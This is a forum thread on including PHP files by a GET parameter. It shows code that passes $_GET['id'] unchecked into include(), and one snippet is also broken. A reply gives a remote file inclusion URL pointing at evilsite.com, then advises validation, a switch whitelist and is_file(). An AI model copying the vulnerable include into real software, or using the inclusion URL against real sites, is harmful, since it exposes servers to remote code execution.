<?php

$id = $_GET['id'];
include ('file_id.php'.$id)

?>

Thanks badone, would u mind to elaborate a little on how this all works?

It sounds like you understand the first part of the process, which is to pass a value when you call the page. For example, mypage?parm=52.

What happens after that? First of all, you won't be able to do this with a plain old HTML document. You'll need to make it a php document. Then, using the example above you use the $_GET variable to retrieve the passed value and take whatever action you want based on that value. So your new php document will have something like this, usually near the top of the code.

<?php
$id = $_GET['id'];
$include_file = $id . 'php';
?>
Regular html stuff
Time to display the included content for that page.
<?php include ('$include_file');?>
More regular html stuff.

Hope that helps.

is there any risk of getting hacked using the above method?

Yes, there is always a risk when you are passing parameters (using GET or POST methods). But that risk can be eliminated/minimized with a few simple procedures. One way would be to create a whitelist, a list of known good parameters. If something is passed that isn't in the list, you take a default action. For what you're doing that's probably not the best method since you have to maintain the list for every page you want to include.

You should always validate and clean input to your scripts. Some useful hints can be found in our own library at PHP Security [webmasterworld.com].

would a SWITCH structure be helpful for that matter? instead of passing the values directly?

That I cannot answer. I just pass parameters and take the necessary precautions.

can u name one of the precautions that u take? please?

if you are using numeric ids, make sure they are numeric before you do anything with them

properly handle the scenario where a number passed does not correspond to a valid row

> is there any risk of getting hacked using the above > method?

$id = $_GET['id'];
$include_file = $id . 'php';

that's one is extremely vulnerable especially if you have url_fopen wrappers enabled.

Just an example:

mypage.php?id=http://evilsite.com/hacktool

$id = $_GET['id'];
$include_file = $id . 'php';

the code will include the hacktool script and can make a lot of troubles :)

Always validate the user input.

If you expect the ID to be an integer, do a simple chek like is_numeric($id)

Another option would be to make some switch() construction.

switch($id){
case "1":
include('file1.php')
break;
case "2":
include('file2.php')
break;
default:
include('defaultfile.php')
break;
}

Thanks vdoyl, this is really helpful since I am a complete newbie in the php world.

I think I am gonna go with the is_numeric($id) option...

Would it be also a good idea to check if the file exists on my server (not sure how to do that) before doing anything?

Thanks again

yes, that's a good idea

try this
[php.net...]

Thanks Jakar

I was looking into the php.net and its been helpful, wouldn't it be a better idea to use file_exists instead?

that works too, I don't know if one is better

is there actually a function called is_numeric?

I would go with is_file() [php.net] as that tells whether the filename is a regular file. file_exists() [php.net] merely checks whether a file or directory exists.

The PHP manual pages have a search tool where you can search for any function. It is near the upper right of the page. Yes, is_numeric() [php.net] is a function.